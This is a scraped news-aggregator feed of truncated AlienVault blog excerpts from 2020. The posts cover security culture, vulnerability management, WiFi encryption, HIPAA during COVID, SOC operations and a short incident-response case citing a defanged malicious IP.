facing network services, particularly on Windows systems, will be a primary candidate for this sort of attack vector. 3) Ensure you have a mechanism to ensure pr]]> 2020-07-08T11:00:00+00:00 https://feeds.feedblitz.com/~/629774273/0/alienvault-blogs~Ransomware-attacks-on-the-perimeter www.secnews.physaphae.fr/article.php?IdArticle=1796485 False Ransomware,Data Breach,Vulnerability None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC 2020-07-08T08:15:00+00:00 https://feeds.feedblitz.com/~/629765595/0/alienvault-blogs~Zero-Trust-security-model-explained-what-is-Zero-Trust www.secnews.physaphae.fr/article.php?IdArticle=1796395 False Tool,Vulnerability,Threat None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC 2020-07-08T08:07:00+00:00 https://feeds.feedblitz.com/~/629764315/0/alienvault-blogs~Vulnerability-assessment-steps-process-explained www.secnews.physaphae.fr/article.php?IdArticle=1796396 False Vulnerability,Threat,Patching None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC 2020-07-08T07:33:00+00:00 https://feeds.feedblitz.com/~/629763915/0/alienvault-blogs~Types-of-DDoS-attacks-explained www.secnews.physaphae.fr/article.php?IdArticle=1796329 False Threat,Guideline None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC 70% of Americans conducting their banking primarily online, it’s easy to see that a lapse in judgment or ignorance of how to stay safe could have serious consequences for many. Unfortunately, sufficient cyber hygiene practices are rare. A recent survey by Avast revealed that 83% of Americans use weak passwords, meaning that a large portion of the country’s private information is within arm’s reach of a hacker. This spells trouble for businesses. If so few individuals can implement proper security protocols in their personal lives, how can businesses with hundreds or thousands of employees ensure that each of them will keep the company’s information safe? As they say: a set of loose lips can sink a ship — or in this case, leave a company’s data vulnerable to attack. A recent literature review by a research group at Royal Holloway, University of London looked into the factors that affect cybersecurity behaviors within organizations. They found that the key to an organization’s digital safety is fostering a robust security culture. While there’s no magic bullet that will instantly transform a poor security culture into a good one, there are specific actions that organizations can take to move them in the right direction. Here, we’ll take a look at what leads to a strong security culture and what companies can do to promote one. What is security culture? In general, security culture can be thought of as a series of security-related beliefs held by a group or organization and the behaviors that follow from those ideas. For example, a good security culture is one in which the organization as a whole believes in the importance of cybersecurity, uses secure invoicing software, and enforces policies on strong passwords. A poor security culture would be one in which the CEO decries cybersecurity practices as a waste of time and allows employees to send passwords via unencrypted email. Based on recent research, the factors that affect security culture can largely be divided into four main subcategories: compliance with company policy, intergroup dynamics, email behavior, and password behavior. How to improve compliance with company policy In this day and age, many organizations have some kind of company policy on cybersecurity best practices. However, merely having a policy doesn’t mean that employees will follow the rules. Unfortunately, it’s estimated that over half of all company security breaches are the direct result of an employee failing to adhere to company policy, not the lack of a strict policy in the first place. In many cases, these failures to comply occur because employees believe that the policies are simply guidelines, not hard rules. They will weigh the perceived rewards (typically convenience) and the consequences of their actions when deciding whether or not to comply. Despite the numerous]]> 2020-07-07T11:00:00+00:00 https://feeds.feedblitz.com/~/629690797/0/alienvault-blogs~Building-security-culture-How-organizations-can-improve-cybersecurity www.secnews.physaphae.fr/article.php?IdArticle=1794733 False Threat,Guideline None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC According to the website Cyberseek, there are around 22,000 available jobs in the LA area with a supply/demand ration of 1.5. With a national average for all other positions at 4.9, you begin to see why staffing these roles can be a challenge. Resource prioritization So how can organizations cope with these natural limitations? The answer is resource prioritization, along with a healthy dose of operational improvements. By identifying areas where processes can be streamlined and understanding what the most significant risks are, organizations can begin to help protect their systems while staying within their constraints. This task is not quite as impossible as it seems. The first step is to make sure you understand the following components: The goal of the organization  Responsibilities and operations of the target department Any regulatory or internal requirements Once you know those points, you can begin the actual work. The best way to find areas to improve processes is to work directly with the specific departments. While the focus of this blog is IT or security departments, this process can be used pretty much anywhere. Through a mixture of interviews and process documentation, you can begin to assemble a picture of how departments operate. The graphic below outlines the basic review and improvement cycle that can be employed when conducting this type of work. Later in this blog is a more in-depth multi-level strategy that can be employed later down the line or immediately for companies that want to engage in a more long-term assessment and improvement cycle. As always these steps can also be integrated into any existing review or audit procedures as well. Working with frontline employees is one of the most effective ways to understand what occurs in your organization. These employees will almost always be able to provide ideas or suggestions on how to improve workflow and general operations. All proposals should be reviewed for accuracy and effectiveness but getting data straight from the source is a great way to develop actionable plans. It almost seems too simple to work. Can asking questions like "What can we do better" or "Where do we spend the most time" really lead to a better protected company? Of course! Freeing up your staff so they have more time to focus on security concerns is one of the most direct ways to combat the three-headed hydra introduced in the beginning. The hardest part of this process is finding the right employees and asking the right questions. When it comes to selecting the employee(s) you talk to, you must pick the ones responsible for the work in question. If, for instance, you wanted to streamline or improve the ticketing system, you should talk to the service desk staff and manager. The closer you get to the actual work being done, the more valuable the insight you gain. Belo]]> 2020-07-06T11:00:00+00:00 https://feeds.feedblitz.com/~/629620342/0/alienvault-blogs~Improving-workflows-to-speed-security-implementation www.secnews.physaphae.fr/article.php?IdArticle=1792648 False Threat,Guideline None 5.0000000000000000 AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC National Institute of Standards and Technology (NIST). At a high level, SCAP can be broken down into a few components: Common vulnerabilities and exposures (CVE) – Each CVE defines a specific vulnerability by which an attack may occur. Common configuration enumeration (CCE) – A CCE is a list of system security configuration issues that can be used to develop configuration guidance. Common platform enumeration (CPE) – CPEs are standardized methods of describing and identifying classes of applications, operating systems, and devices within your environment. CPEs are used to describe what a CVE or CCE applies to. Common vulnerability scoring system (CVSS) – This scoring system works to assign severity scores to each defined vulnerability and is used to prioritize remediation efforts and resources according to the threat. Scores range from 0 to 10, with 10 being the most severe. Many public sources of vulnerability definitions exist, such as the National Vulnerability Database (NVD) or Microsoft’s security updates and are freely available. Additionally, several vendors offer access to private vulnerability databases via paid subscription. Security conf]]> 2020-07-02T13:01:00+00:00 https://feeds.feedblitz.com/~/629371410/0/alienvault-blogs~Vulnerability-management-explained www.secnews.physaphae.fr/article.php?IdArticle=1785541 False Malware,Vulnerability,Threat,Patching None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Image Source In Part 1 of this series, we covered the first step to better cybersecurity in touchless business solutions, which is to practice extra caution in cashless payment solutions. We continue by discussing the second step to improve cybersecurity for touchless systems, which is to increase protocols for cybersecurity and data privacy. Heighten cybersecurity and data protection protocols Amazon launched Amazon Go in 2016, a connected grocery store that promises no lines, no check-outs, and no registers. It uses what Amazon calls a “Just Walk Out” technology that integrates computer vision, deep learning algorithms, and sensor fusion, just like the technology in self-driving cars. Shoppers can just walk into an Amazon Go store, check-in through the Amazon Go app on their phones, and shop. They can automatically check out by picking items off the shelf. The multiple sensors within the store record items the customer has taken out. The customer gets charged on their account with the store items through the app. Video Source In China, Jack Ma’s Alibaba has opened around 65 locations for its Hema Store that utilise robotic technology, online payment apps, and overhead conveyor belts to revolutionise shoppers’ experience. It’s a great mix of online and offline shopping, where customers physically go to a store, browse items they want to buy, and then scan products with their Alibaba app to get more product details or add the product to cart. Consumers can also choose to have the products delivered right to their homes, even within the next 30 minutes. Xenia and Aurus also aim to put the power of the POS (point of sale) in the pocket of their guests. They offer cashierless technology that provides a seamless shopping experience in furniture retail. In its app, you will see product details, purchase history, peer reviews, and other recommended items, and other additional information useful for guests. The consumer can start a cart from home, seamlessly shift to the offline store, and end the transaction through the instant cart to “paystation” transfers. Caper introduces self-directed check-out with their AI-powered shopping carts with image recognition and sensor fusion. These “Smart Carts” were launched in a couple of groceries in New York City in 2019. Instead of installing hardware and retrofitting the entire store, which not all businesses would be able to implement immediately, Caper works with simple software integration so shoppers can scan, pay, and go. Carts are connected to the store’s central POS system and can scan the grocery item barcode with no app download necessary. The system can]]> 2020-07-02T11:00:00+00:00 https://feeds.feedblitz.com/~/629364066/0/alienvault-blogs~Steps-to-better-cybersecurity-in-touchless-business-solutions-Part-of www.secnews.physaphae.fr/article.php?IdArticle=1785330 False Data Breach,Malware None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC here.         ]]> 2020-07-01T15:00:00+00:00 https://feeds.feedblitz.com/~/629296078/0/alienvault-blogs~New-report-COVID-Threat-Intelligence-Insight-from-the-Telco-Security-Alliance www.secnews.physaphae.fr/article.php?IdArticle=1783723 False Threat None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC 2020-06-30T11:43:00+00:00 https://feeds.feedblitz.com/~/629220148/0/alienvault-blogs~Cybersecurity-penetration-testing-explained www.secnews.physaphae.fr/article.php?IdArticle=1782771 False Malware,Vulnerability,Threat None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC news articles have been published detailing how cybercriminals are outsourcing vulnerability analysis of their malware.Think about for a minute: criminal cyber threat organizations are now reaching a maturity level in their operations that has only been seen before in nation-state cyber operations. The reasons to perform Quality Assurance (QA) on malware are the same reasons to perform it on traditional applications: protecting one's investment. Companies writing software want to take steps to provide the product they bring to the market does not contain vulnerabilities that could lead to public disclosure and, ultimately, revenue loss.  A criminal group has the same reasons, but for the purpose of keeping their technology viable for as long as possible.  A nation-state cyber organization, albeit with different goals and objectives, also conducts code analysis on their tools to protect their investment in time and money. The more sophisticated malware becomes, the more expensive it is to build and maintain. Starting around five years ago the cybercrime industry moved away from “in-house” development and a cottage industry of services marketed explicitly towards criminal groups began.  These services initially marketed themselves in hacker forums and TOR-based web sites, but the explosive growth has seen them begin advertising on internet with ads placed with popular search engines. These are true cottage industries; small decentralized businesses often operated out of a residence. They perform services from gaining initial access to the more traditional malware code development. Due to the amount of money collected through the use of ransomware over the last few years and  cybercriminals projected annual earnings of $20 billion by 2021, we will continue to see a growth in outsourced services focused exclusively on a criminal clientele. But as we see]]> 2020-06-30T11:00:00+00:00 https://feeds.feedblitz.com/~/629191126/0/alienvault-blogs~Ransomware-observations www.secnews.physaphae.fr/article.php?IdArticle=1781477 False Ransomware,Malware,Vulnerability,Threat,Guideline None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC VPN, which provides its own encryption. I would strongly recommend using a VPN when you use open WiFi, no matter what you’re doing. Then there’s encrypted WiFi. Encrypted WiFi turns all the data you upload and download into scrambled code that’s useless to a cyber attacker unless they crack the code or have a decryption key. As of 2020, there have been four technology standards for encrypted WiFi used so far-- WEP, WPA, WPA2, and WPA3. You will need a password in order to use an encrypted WiFi signal no matter which standard you use. But the newer a standard is, the better it is for your security. Let’s quickly run through the older standards until I get to the latest standard, WPA3. Reviewing WEP and older standards WEP stands for Wired Equivalent Privacy. It’s the oldest wireless encryption standard, and it debuted in 1997-1999, becoming commonly used by the early 2000s. Maybe WEP gave you “wired equivalent privacy” back in the day. But password cracking applications have improved a lot since then, as has the computer processing speed in devices that can be used to crack WEP. There are also easy exploits that can be used to acquire WEP keys without having to crack the encryption directly. Actually, I could run an app on my phone that could probably crack any WEP encryption within minutes. Don’t use WEP, it hasn’t been secure for over a decade now! A couple of years after WEP debuted, there were already concerns about how weak the standard was. So the WiFi Protected Access standard was developed, or WPA for short. The main weakness of WPA was that it was designed to use some of the same vulnerable technologies that WEP used. But that’s because WPA was designed so that devices that were made to use WEP could use the more secure WPA with a software update. WPA was a compromise that was made to improve upon WEP without people needing to buy new routers and computer components, to encourage adoptation. So it was still worth implementing. WPA2 was launched in 2004. People and businesses with WEP devices would need to buy new WPA2-capable devices in order to use the improved encryption standard. Finally there was wireless encryption that lacked all of WEP’s major weaknesses. But WPS (WiFi Protected Setup) is a part of WPA2 technology that was made to make using WiFi easier with certain devices. Without getting into too much technical jargon, cyber attackers found a way to bypass WPA2 encryption through WPS. If WPA2 is the most recent standard your devices can use, you should definitely choose it. WPA2 is much more secure than unencrypted WiFi or WEP.  What is WPA3 and what are the benefits for enterprises? So it took fourteen years after the debut of WPA2 for its successor to arrive. But by 2018, WPA3 was announced. There were exploits against WPA2 like KRACK that won’t work against WPA3. In general, WPA3 ]]> 2020-06-29T11:00:00+00:00 https://feeds.feedblitz.com/~/629106908/0/alienvault-blogs~WPA-security-explained-what-is-WiFi-Protected-Access www.secnews.physaphae.fr/article.php?IdArticle=1779874 False None None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC 2020-06-26T03:59:00+00:00 https://feeds.feedblitz.com/~/628859350/0/alienvault-blogs~SDWAN-security-explained www.secnews.physaphae.fr/article.php?IdArticle=1775590 False None None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Portability and Accountability Act (HIPAA), which is a regulation to safeguard a patient’s healthcare information from impermissible or unauthorized use and disclosure. Healthcare providers cannot make an individual’s information public without their written consent, unless it is critical for the public’s protection or the patient’s treatment. In case of Covid-19, where HIPAA regulation may limit what can be shared about a patient, it may create difficulty for public health agencies to trace the recent contacts and possible spread of virus. At the same time, sharing information such as names of Corona-positive cases can also lead to unwanted attention and harassment. In the light of this current pandemic, the Office of Civil Rights (OCR), the body responsible for the enforcement of HIPAA, has issued notices regarding the relaxation in some of the HIPAA requirements to allow health practitioners to focus their resources on patient care. Though these requirements have not been suspended due to Covid-19, but violation of some of them while the pandemic lasts will not lead the subject to face non-compliance issues.  Let us look at some of the HIPAA requirements relaxed during the time of Covid-19. Telehealth In view of social distancing, healthcare providers treating their patients via telehealth will not be subject to any penalty for violating HIPAA rules. Doctors using video or audio communication to provide telehealth service can use any audio or video non-public facing device for communicating with patients, irrespective of security precautions. This discretion is for telehealth consultation provided for all sorts of treatments, and is not only for treating corona patients. Doctors and healthcare professionals can, therefore, use web and mobile apps using internet services such as Excede Internet, and conduct non-public facing chats including Facebook messenger, Facetime, Skype, or Google Hangouts without the risk of penalty for being noncompliant with HIPAA rules. OCR has also stated that such health care providers will not be penalized for not having Business Associate Agreement with these application vendors. First responders The OCR has issued guidelines to help first responders to receive Protected Health Information (PHI) of corona infected or exposed individuals. The guidelines clarify how first responders may disclose the minimum required PHI such as names or other identification to paramedics, law enforcement, or other first responders; in cases where they are required to take precautions or wear personal protective equipment. This can be done in situations such as when it is necessary to treat a patient, when the law requires it, for notifying a public health authority, when first responders are at risk of getting infection, and for preventing or reducing an impending health and safety hazard. However, under no circumstances are health authorities allowed to make this information publicly available. Business associates OCR will not impose a penalty on healthcare providers and their business associates for violating certain HIPAA provisions where the intention is good faith and disclosure of Public Health Information for the sake of public health activities. This discretion aims to support health oversight agencies and public health authorities, state emergenc]]> 2020-06-25T11:00:00+00:00 https://feeds.feedblitz.com/~/628742408/0/alienvault-blogs~HIPAA-in-the-time-of-Covid www.secnews.physaphae.fr/article.php?IdArticle=1773532 False Guideline None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC 2020-06-23T17:33:00+00:00 https://feeds.feedblitz.com/~/628645610/0/alienvault-blogs~Managed-security-operations-center-SOC-explained www.secnews.physaphae.fr/article.php?IdArticle=1771873 False Threat None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC cybersecurity is at a tipping point, they argue, and photonic computers are already being deployed to break PGP encryption, it is now time to arm ourselves with systems that match those being deployed against us. In this article, we'll look at the emerging field of quantum cryptography, and at quantum key distribution (QKD) in particular. We'll then explain what the emergence of these technologies means for the average cybersecurity analyst. The threat of quantum computers By now, most of us are aware of the fundamental details of quantum computing, and what it could mean for the safety of commonly used public-key cryptographic protocols. In short, quantum computers can factorize large integers much, much more quickly than traditional computing architectures, and this means that decrypting the 1024-bit keys used by the RSA encryption protocol (for instance) will take a quantum computer a few hours, rather than the years the same process would take on today’s computers. At the moment, no such decryption attacks have been seen in the wild, and the perceived reality is that it may take decades before quantum computers have the necessary computing power to be used in this way. Nevertheless, given the reliance of many modern systems on such algorithms, researchers are already looking at ways to protect against this kind of attack. What is quantum cryptography? Some of the proposed solutions are essentially extensions of existing cryptographic schemes. NIST, for instance, is already recommending that organizations use 2048-bit RSA encryption as a minimum, and that this standard be used for everything from encrypted cloud storage to encrypted email services. Similarly, some analysts argue that extant protocols like TLS can be improved to combat the threat of quantum decryption algorithms. Others are exploring the concept of lattice cryptography, which appears to be uncrackable even by quantum computers. The most exciting area of present research, however, relies on using the power of quantum computers to encrypt data, and therefore protect it against even quantum-enabled attacks. This is where the idea of quantum key distribution (QKD) comes in. QKD is built on the system of public key exchange that underpins familiar public-key cryptographic systems, but also makes use of the strange properties of individual photons. The systems being explored at the moment are deployed on standard fiber optic cables, but instead of using them to send a data signal, individual photons are sent. Because these individual photons are entangled with photons being held in the sender’s system]]> 2020-06-23T11:00:00+00:00 https://feeds.feedblitz.com/~/628498566/0/alienvault-blogs~What-quantum-cryptography-means-for-cybersecurity www.secnews.physaphae.fr/article.php?IdArticle=1770543 False Threat None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC                                 Image Source This blog was written by an independent guest blogger. The current pandemic that has upended our lives and wreaked havoc across the world have also humbled countries to a shocking degree. As borders closed, so did major sectors, industries, and businesses. Brick-and-mortar establishments had to cease operations and resume their business remotely to comply with quarantine measures.  As conditions are getting better, the next challenge is for governments to restore both lives and livelihoods. Businesses are now preparing strategies and solutions on how to get safely back to work while complying with quarantine guidelines released by policymakers and preserving both their workforce and customers.  All the countries that kept their economy going followed rigorous physical distancing rules, aside from other measures to contain transmission chains. These countries give hope that getting back to a “new normal” is indeed possible, even if we do not see an end yet to this global tragedy. The demand for social distancing is hastening our transition to a more digital economy. Businesses need to streamline their operations, automate, and integrate touchless solutions to preserve human touch and prevent contamination. But heightened automation and touchless technology also call for more robust cybersecurity systems to prevent fraud, data breach, and attacks. This is a 3-part series discussing ways to better cybersecurity in touchless business solutions, with recommended preventive measures against cyber attacks that keep both business and clients secure. Practice extra caution in cashless payment solutions. Because of the severity of the virus attack on individuals, many establishments in different countries have banned cash payments altogether. Debit/credit card payments were made touchless manually, with cashiers letting consumers swipe their cards on the PED, which are then cleaned and sanitised after every use.  But a more straightforward way to go touchless is to go cashless, with the use of E-wallet payment systems and payment apps. An E-wallet is an app that lets you store money, transfer directly to your bank account, so you can use your mobile to shop and pay for items by scanning a QR code. The E-wallet can be connected directly to a consumer’s debit/credit account. The more cautious consumer can also top up or load just the cash they need on their E-wallets before making any transaction. No matter what system consumers use, every part of the sale is digital from payment to receipts. Even for microbusinesses in small communities, cashless payment is still possible through online payment apps. Risks in cashless payment solutions ●Smishing attacks Smishing is a kind of phishing attack where someone tricks you into giving your credentials through a phone call or SMS message. It has become a significantly growing threat in the world of online security. The pandemic only encouraged hackers to intensify their smishing efforts. Untrusted apps and phishing SMSes are giving cyber attackers full access to consumer’s phone and e-payments. For instance, a hacker can send a phishing SMS disguised as c]]> 2020-06-22T11:00:00+00:00 https://feeds.feedblitz.com/~/628351082/0/alienvault-blogs~Steps-to-better-cybersecurity-in-touchless-business-solutions-part-of www.secnews.physaphae.fr/article.php?IdArticle=1770246 False Threat None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Cyberattacks triggered over 7,000 breaches in 2019, exposing 15.1 billion records The average cost of data breach is now $3.92M It takes an average of 279 days to identify and contain a breach. 86% of organizations rate the SOC as anywhere from important to essential to their cybersecurity strategy 5 goals of any modern SOC 1. Reduce time to response One of the top goals of a modern SOC is to accelerate the pace at which security analysts can detect signs of an attack, investigate the associated activity, and start remediation to shut down the threat. The less time cyber attackers have to poke around, unrestricted on organizational systems, the less opportunity they have to break into high-value assets and steal sensitive information. 2. Minimize breach impact Everything a SOC does comes down to minimizing the impact of breaches and other risks to the organization. The SOC's work on cutting down on attack dwell time—the time before detection — helps minimize breach impact. So does effective prioritization of SOC activity based on factors like the severity of vulnerabilities in an asset, threat intelligence about attack trends, and business criticality of an asset. Effective SOCs can make all the difference in keeping minor security incidents from becoming a major breach. 3. Increase security visibility SOC operators understand that the more they know about their systems, the easier it will be to identify attacks against them. SOCs seek to expand security visibility and incident response coverage by establishing thorough inventories of their organizational IT assets and instrumenting near-real-time security monitoring to be ready to alert when threats strike. 4. Stay a step ahead of attackers SOCs aim to move beyond reactive incident response and strive to evolve their activities to include proactive threat hunting. The stealthiest attackers work hard to avoid detection, which is why veteran SOC analysts sift through digital clues to find early evidence of attacks that may not always trigger alarms but are nevertheless worth investigation. 5. Keep business informed of risk The final goal of the SOC is to keep up with reporting an]]> 2020-06-18T20:31:00+00:00 https://feeds.feedblitz.com/~/628025448/0/alienvault-blogs~Benefits-of-a-security-operations-center-SOC www.secnews.physaphae.fr/article.php?IdArticle=1770247 False Data Breach,Threat,Guideline None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC free resources that make it easy to ad]]> 2020-06-18T11:00:00+00:00 https://feeds.feedblitz.com/~/627966408/0/alienvault-blogs~Why-right-now-is-the-best-time-to-assess-your-cyber-response-to-COVID www.secnews.physaphae.fr/article.php?IdArticle=1770248 False Vulnerability,Guideline None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC As states begin to lift shelter in place orders and businesses reopen their doors, there is a lot of speculation as to what “the new normal” will look like. And so far, there are still more questions than answers for those of us working from home. When is it safe to return to work? Will we have to run at reduced occupancy? What if cases of COVID-19 spike again or returns in the fall? Is it even necessary to return to the office when employees can work from home? None of us have a crystal ball to accurately predict when we will return to our cubicles, but if anything, this global event has made it abundantly clear that business continuity relies heavily on enabling employees to work from virtually anywhere. On the surface, this may seem like a fairly simple task. The majority of workers have some sort of mobile device, whether it be a laptop or smart phone, as well as internet access. A lot of us have already been working remotely at least part of the time prior to the pandemic. But for technology teams that are tasked with supporting the work from home initiative, the solution may be a lot more complex. Not only must they solve for access at scale, but visibility and security as well. The first major hurdle for supporting a remote workforce is providing access to the applications and data they require to conduct business. Most organizations have deployed some form of VPN for this purpose, but few have built it with the intention of supporting all of their workers connecting simultaneously. As a result, they are finding that their VPNs are getting overwhelmed and users are experiencing latency or trouble connecting to the network altogether. Employees may attempt to resolve the VPN connectivity or latency issue by just connecting to the Internet directly to accomplish whatever work is possible without accessing the network and by using unsanctioned web-based applications. It’s also very possible that they, or other members of their household, may even use their company owned devices for purposes completely unrelated to work. And when traffic isn’t routed to the data center, businesses operating on a hub and spoke model lose visibility as well as their ability to enforce security policy. Without these guardrails, the possibility of a security incident becomes more likely as employees freely surf the net, click links, and download files without the analysis provided by a perimeter security device. Organizations could certainly respond to these challenges by expanding the capacity of their VPN concentrator. If employees are able to easily access assets hosted on the network and the Internet through VPN without performance concerns, they are a lot more likely to connect to it as a habit when they begin their work day. But this approach still relies on voluntary action on the part of the remote worker and isn’t really the most efficient way for employees to access applications and data hosted in the cloud. Another consideration is that although many VPNs provide similar visibility and security controls as next-generation firewalls, a lot of organizations are still managing both products, using separate user interfaces to protect their on-site and remote users. Businesses that want future ready security and  to maintain visibility across users, during the pandemic and beyond, should give strong consideration to a cloud-based security solution that does not rely on backhauling traffic to the data center for enforcement. Security hosted in the cloud means fewer appliances to purchase and manage but can also help provide the flexibility that is desperately needed during this time of uncertainty by following users virtually anywhere they conduct business. There are a lot of point products on the market that can solve the challenge of providing zero-trust ne]]> 2020-06-17T11:00:00+00:00 https://feeds.feedblitz.com/~/627827946/0/alienvault-blogs~The-challenge-to-security-for-the-new-normal www.secnews.physaphae.fr/article.php?IdArticle=1770249 False Malware None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Image Source: Pexels Small businesses are significant contributors to the economy. According to the U.S. Small Administration, they generate approximately 44% of the gross domestic product (GDP) in the U.S. However, small to medium enterprises (SMEs) are also frequently more vulnerable to the threats of our contemporary digital landscape. Small businesses that utilize the supply chain have frequently been subject to risks, as their vetting processes for vendors and partners may be less stringent than larger businesses.  But as the implementation of and reliance upon technology has grown, cybersecurity has become one of the most significant issues for even small businesses. Supply chain management consists of many moving parts and is therefore often subject to various points of vulnerability. For small businesses, if these are mismanaged, cybercriminals have the potential to cause serious damage. We’re going to take a look at some of the key cybersecurity risks that small businesses face. How can leaders manage these risks more effectively, and what tools are at their disposal? The risks Cybersecurity is a prevalent threat in almost every industry. Some are more attractive targets than others; either due to a greater prospect of reward for the criminal or the presence of weaker system protections. Few are immune to risk. However, small businesses utilizing the supply chain are subject to some specific areas of vulnerability, including: Partners. Small businesses are not always able to own or operate every step of their supply chain. This means that they are often reliant upon partners to handle essential elements such as logistics or supply of raw materials. While these relationships are positive for all concerned, there is a risk present in inconsistent cybersecurity protections across all partners. If one link in the chain doesn’t have sufficient system protections, this can present the risk of a breach to all companies they are connected to and even expose customers themselves. Software. Small businesses are unlikely to utilize their own proprietary software solutions and must engage software as a service (SaaS) providers, or outsource their infrastructural needs. While this can be a useful option for many SMEs, leaders are trusting that these third-party vendors are operating robust cybersecurity protocols and providing sufficient protection for data collection, sharing, and storage. Digital Assets. Small businesses in the supply chain must understand that their physical assets are not the only aspects that make them a target. Customer data, operating practices, and financial information can all attract unwanted attention from cybercriminals. Even specific intellectual property, down to the business model, that is unique to your business needs to be protected. Making certain that your company has taken out the correct patents and copyright precautions is an excellent start. However, it's worth remembering that these digital elements are valuable, and therefore a potential point of vulnerability. Solutions Most of us already have some b]]> 2020-06-16T11:00:00+00:00 https://feeds.feedblitz.com/~/627620742/0/alienvault-blogs~Cybersecurity-for-small-business-supply-chain-management www.secnews.physaphae.fr/article.php?IdArticle=1770250 False Tool,Vulnerability,Threat,Guideline None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC more vulnerable targets to cyberattacks. Schools are finding themselves outmatched as these threats intensify. Parents likewise need to learn about and ensure safe cybersecurity practices for their kids, and would therefore also benefit from learning about the security methods that we are about to cover. In this article, we’ll discuss how school technology leaders can develop the necessary strategies to protect against and mitigate breaches by procuring technology and developing risk management policies and planning for incidents before they occur. Why Are Schools At Risk of Cyber Attacks? In the face of the COVID-19 pandemic, the focus and attention of most of the cybersecurity community have been on protecting government institutions, the airline industry, and the healthcare industry from hackers. This is good, but educational institutions are at just as much risk from malicious hackers as the above industries and organizations are as well. If anything, this risk has only increased significantly due to the record numbers of students who are now attending school via online learning platforms, video conferences, and e-learning environments. In the United States, the Federal Bureau of Investigation has warned extensively about the greatly increased cybersecurity risks of teleconferencing and online classrooms. The FBI specifically cites examples of malicious cybercriminals delivering threatening content to Zoom classroom calls (colloquially referred to as Zoom-bombing), which has even resulted in numerous school districts pulling out of Zoom and seeking alternative platforms. This highlights a larger issue of schools and school districts using technology that has either not been properly vetted or that educators and students are not prepared to use safely. In other words, even as school districts turn to alternative teleconferencing options besides Zoom, they can still be a major risk of falling prey to hackers and cybercriminals. This leads us to our next question: what exactly can school districts and educational inst]]> 2020-06-15T11:00:00+00:00 https://feeds.feedblitz.com/~/627516638/0/alienvault-blogs~Cybersecurity-in-education-Securing-schools-as-they-transition-to-online-learning www.secnews.physaphae.fr/article.php?IdArticle=1768813 False Malware,Vulnerability,Guideline Deloitte None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC 2020-06-11T11:00:00+00:00 https://feeds.feedblitz.com/~/626876940/0/alienvault-blogs~Bluetooth-security-risks-explained www.secnews.physaphae.fr/article.php?IdArticle=1761425 False Spam None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC have been hit hard and forced into a dire financial situation. It’s very likely that going forward, airports will be forced to implement stricter screening before permitting boarding, in addition to needing more government bailouts and loans to stay afloat. But one of the more overlooked areas where airline companies and airports have been hit hard during the coronavirus pandemic is when it comes to cybersecurity and data privacy. It’s very typical of hackers to take advantage of major crises to spread malware, steal company and customer data, and cause chaos. Unfortunately, the current crisis has been no different. As airports and airline companies work together to devise strategies on how to properly re-open, an Assure cybersecurity audit model has been created in conjunction with Crest to help strengthen cybersecurity for the aviation industry in general. Specifically, the Assure scheme aims to enable the aviation industry to better manage their cybersecurity risks, and without compromising aviation safety or resilience. In this article, we’ll explore the current cyber threats that airports and airlines are facing, how prepared they are to meet those threats, and how exactly the Assure model could benefit the aviation industry in general. Why is cybersecurity an issue for the airline industry? Cybersecurity is a fundamental issue for the airline industry because airlines are incredibly vulnerable to cyberattacks. One reason for this is the large number of wireless devices that almost all modern airliners utilize. These include in-flight entertainment systems (IFEC), electric flight bags (EFBs), IoT devices intended to automate repairs or increase fuel efficiency, and any other Wi-Fi connectivity systems installed on the plane. In other words, each individual airplane has numerous targets that cybercriminals can go after to gain access to systems and any data stored within them. It’s not much better at airports, and if anything, airports are actually more vulnerable than airplanes are. According to the Airports Council International (ACI), addressing cybersecurity concerns needs to be a core priority for airports as they attempt to resume normal and business operations. Specifically, the ACI urges airports to utilize a common information-sharing approach, secure connectivity with cloud-based virtual private servers, secure IT infrastructure for remote access, and teach]]> 2020-06-10T11:00:00+00:00 https://feeds.feedblitz.com/~/626688266/0/alienvault-blogs~Are-airports-and-airlines-prepared-for-cyber-threats-post-COVID www.secnews.physaphae.fr/article.php?IdArticle=1759351 False Malware,Threat None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC 2020-06-09T11:00:00+00:00 https://feeds.feedblitz.com/~/626566586/0/alienvault-blogs~Fireside-chat-cybersecurity-thought-leadership www.secnews.physaphae.fr/article.php?IdArticle=1757589 False Ransomware,Threat None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Open Threat Exchange™ (OTX®). After a carefully curated analysis of the activity at hand was presented to the customer, we worked closely with their IT personnel to remediate the concerning behavior and implement safeguards to help prevent similar occurrences. Investigation Initial Alarm Review Indicators of Compromise (IOCs) The initial alarm surfaced as the result of egress traffic to the OTX IOC 222[.]186[.]19[.]221, an IOC found in several OTX pulses with the designation of ‘Actively Malicious’. Figure 1 - Initial Alarm Expanded Investigation Alarm Detail During our preliminary analysis, we suspected this behavior to be an attempt to create a VPN through the client’s firewall to ultimately connect to a malicious host. Upon further review, we determined that the nature of these egress attempts implied the potentiality of a compromised system. Following the completion of our reconnaissance efforts, we presented our actionable information to the customer and requested their consent to continue our efforts. After reviewing the investigation, the customer was quick to respond and requested guidance on how to proceed with employing a firewall rule to prevent further outbound traffic. Given the limitations of their experience with firewall policies, we facilitated relevant documentation for ‘geo-blocking’ the origin country of the IOC. Figure 2 - Analyst 